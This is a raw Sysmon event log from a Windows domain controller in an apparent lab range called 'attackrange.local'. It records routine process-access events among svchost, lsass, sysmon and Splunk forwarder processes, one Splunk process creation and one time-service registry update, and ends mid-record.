13:17:20.196{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004940Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:20.196{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004939Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:20.196{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004938Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:20.196{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004937Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:20.196{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004936Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:20.196{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004935Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:20.196{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4460-6000-1801-000000009A01}1616C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004934Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:20.196{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4460-6000-1801-000000009A01}1616C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004933Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:20.197{08A6967A-4460-6000-1801-000000009A01}1616C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004966Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:29.651{08A6967A-4288-6000-0D00-000000009A01}6122720C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004965Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:29.651{08A6967A-4288-6000-0D00-000000009A01}6122720C:\Windows\system32\svchost.exe{08A6967A-42BD-6000-8600-000000009A01}4780C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004964Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:29.651{08A6967A-4288-6000-0D00-000000009A01}6122720C:\Windows\system32\svchost.exe{08A6967A-42B0-6000-8400-000000009A01}4268C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004963Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:29.651{08A6967A-4288-6000-0D00-000000009A01}6122720C:\Windows\system32\svchost.exe{08A6967A-4299-6000-4A00-000000009A01}3740C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004962Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:29.651{08A6967A-4288-6000-0D00-000000009A01}6122720C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3900-000000009A01}3516C:\Windows\system32\wbem\unsecapp.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004961Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:29.651{08A6967A-4288-6000-0D00-000000009A01}6122720C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004960Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:29.651{08A6967A-4288-6000-0D00-000000009A01}6122720C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3800-000000009A01}3396C:\Windows\System32\vds.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004959Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:29.651{08A6967A-4288-6000-0D00-000000009A01}6122720C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004958Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:29.651{08A6967A-4288-6000-0D00-000000009A01}6122720C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004957Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:29.651{08A6967A-4288-6000-0D00-000000009A01}6122720C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004956Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:29.651{08A6967A-4288-6000-0D00-000000009A01}6122720C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004955Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:29.651{08A6967A-4288-6000-0D00-000000009A01}6122720C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004954Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:29.651{08A6967A-4288-6000-0D00-000000009A01}6122720C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004953Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:29.651{08A6967A-4288-6000-0D00-000000009A01}6122720C:\Windows\system32\svchost.exe{08A6967A-4288-6000-0E00-000000009A01}1076C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004952Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:29.651{08A6967A-4288-6000-0D00-000000009A01}6122720C:\Windows\system32\svchost.exe{08A6967A-4288-6000-0E00-000000009A01}1076C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004951Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:29.651{08A6967A-4288-6000-0D00-000000009A01}6122720C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1300-000000009A01}1256C:\Windows\system32\dwm.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004950Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:29.651{08A6967A-4288-6000-0D00-000000009A01}6122720C:\Windows\system32\svchost.exe{08A6967A-4288-6000-0E00-000000009A01}1076C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004949Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:29.651{08A6967A-4288-6000-0D00-000000009A01}6122720C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004948Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:29.651{08A6967A-4288-6000-0D00-000000009A01}6122720C:\Windows\system32\svchost.exe{08A6967A-4288-6000-0F00-000000009A01}1124C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004947Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:29.651{08A6967A-4288-6000-0D00-000000009A01}6122720C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004946Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:29.651{08A6967A-4288-6000-0D00-000000009A01}6122720C:\Windows\system32\svchost.exe{08A6967A-4287-6000-0C00-000000009A01}588C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004967Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:47.327{08A6967A-4288-6000-0D00-000000009A01}6122720C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004968Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:49.546{08A6967A-4288-6000-0D00-000000009A01}6122720C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000004969Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:18:00.533{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ea77-0xae99cea9) 10341000x80000000000000004996Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:15.817{08A6967A-4497-6000-1A01-000000009A01}41602160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004995Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:15.676{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4497-6000-1A01-000000009A01}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004994Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:15.676{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004993Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:15.676{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004992Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 